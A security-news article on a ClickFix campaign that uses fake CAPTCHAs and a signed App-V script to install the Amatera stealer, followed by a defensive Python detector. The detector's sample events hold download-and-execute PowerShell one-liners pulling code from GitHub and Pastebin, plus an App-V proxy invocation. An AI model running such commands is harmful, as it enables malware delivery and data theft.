ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services
28.01.2026

ClickFix uses fake CAPTCHAs and a signed Microsoft App-V script to deploy Amatera stealer on enterprise Windows systems.
ClickFix is evolving its attack game, using fake CAPTCHAs and a legit-looking Microsoft App-V script to drop Amatera stealer on enterprise Windows systems. This isn't your grandma's malware; it's a sophisticated operation that's leveling up.
The attack kicks off with a fake CAPTCHA page that is really a social engineering trap. Once you click, it delivers a PowerShell script that masquerades as a Microsoft-signed App-V script. That script then pulls the Amatera stealer from trusted web services such as GitHub or Pastebin, so the download blends in with normal traffic.
Amatera is no joke: it's an info stealer that grabs browser data, crypto wallets, and system info. It uses living-off-the-land techniques, blending in with legit processes to avoid detection. This is enterprise-level targeting, not some random spam.
The attack chain is slick: fake CAPTCHA → PowerShell script → download from trusted services → deploy Amatera. It's designed to bypass security tools by using signed scripts and common web platforms.
Key takeaways: ClickFix is getting craftier, using Microsoft's own tools against you. If you're in enterprise security, watch for unusual PowerShell activity and CAPTCHA pages that feel off. This is a reminder that even trusted services can be weaponized.
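One way to act on that "watch for unusual PowerShell activity" advice, as an added example that is not from the article: a small Python scorer over constructed process-creation events that flags the chain described above (script host launched from the desktop shell, payload pulled from GitHub or Pastebin, download-and-execute one-liner, hidden or encoded command, signed App-V script used as a PowerShell proxy). It assumes SyncAppvPublishingServer.vbs is the Microsoft-signed App-V script being referred to, which the article does not name; the sample events and the alert threshold are made up for the demo.

```python
import re

# Constructed sample process-creation events (Sysmon EID 1 / 4688 style); not taken from the article.
SAMPLE_EVENTS = [
    {"parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell -w hidden -c \"iwr https://raw.githubusercontent.com/example/x/main/a.txt | iex\""},
    {"parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\wscript.exe",
     "cmdline": "wscript C:\\Windows\\System32\\SyncAppvPublishingServer.vbs \"iex (iwr https://pastebin.com/raw/EXAMPLE)\""},
    {"parent": "C:\\Program Files\\Build\\agent.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell -NoProfile -File C:\\build\\deploy.ps1"},
]

INTERACTIVE_PARENTS = ("explorer.exe",)  # Run dialog / desktop-launched processes
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe")
TRUSTED_HOSTING = re.compile(r"raw\.githubusercontent\.com|github\.com|pastebin\.com", re.I)
DOWNLOAD = re.compile(r"\b(iwr|invoke-webrequest|downloadstring|curl|wget)\b", re.I)
EXEC = re.compile(r"\b(iex|invoke-expression)\b", re.I)
EVASION = re.compile(r"-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)
# Assumption: SyncAppvPublishingServer.vbs is the signed App-V script meant; the article does not name it.
APPV_PROXY = re.compile(r"syncappvpublishingserver\.vbs", re.I)


def score_event(ev):
    """Return (score, reasons) for one process-creation event; each matched indicator adds one point."""
    image, parent, cmd = ev["image"].lower(), ev["parent"].lower(), ev["cmdline"]
    reasons = []
    if image.endswith(SCRIPT_HOSTS) and parent.endswith(INTERACTIVE_PARENTS):
        reasons.append("script host spawned from the interactive shell (Run-dialog pattern)")
    if TRUSTED_HOSTING.search(cmd):
        reasons.append("payload pulled from public code/paste hosting")
    if DOWNLOAD.search(cmd) and EXEC.search(cmd):
        reasons.append("download-and-execute one-liner")
    if EVASION.search(cmd):
        reasons.append("hidden window or encoded command")
    if APPV_PROXY.search(cmd):
        reasons.append("signed App-V script used as a PowerShell proxy")
    return len(reasons), reasons


def find_clickfix_candidates(events, threshold=3):
    """Return (score, reasons, cmdline) for events reaching the threshold, highest score first."""
    hits = [(score_event(ev), ev["cmdline"]) for ev in events]
    flagged = [(s, r, c) for (s, r), c in hits if s >= threshold]
    return sorted(flagged, key=lambda x: -x[0])


if __name__ == "__main__":
    for score, reasons, cmdline in find_clickfix_candidates(SAMPLE_EVENTS):
        print(f"[{score}] {cmdline}\n    " + "\n    ".join(reasons))
```

Feed it real Sysmon or 4688 events (parent image, image, command line) and tune the threshold; a single indicator such as a GitHub URL is normal in many environments, but three or more together is the ClickFix shape worth a ticket.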
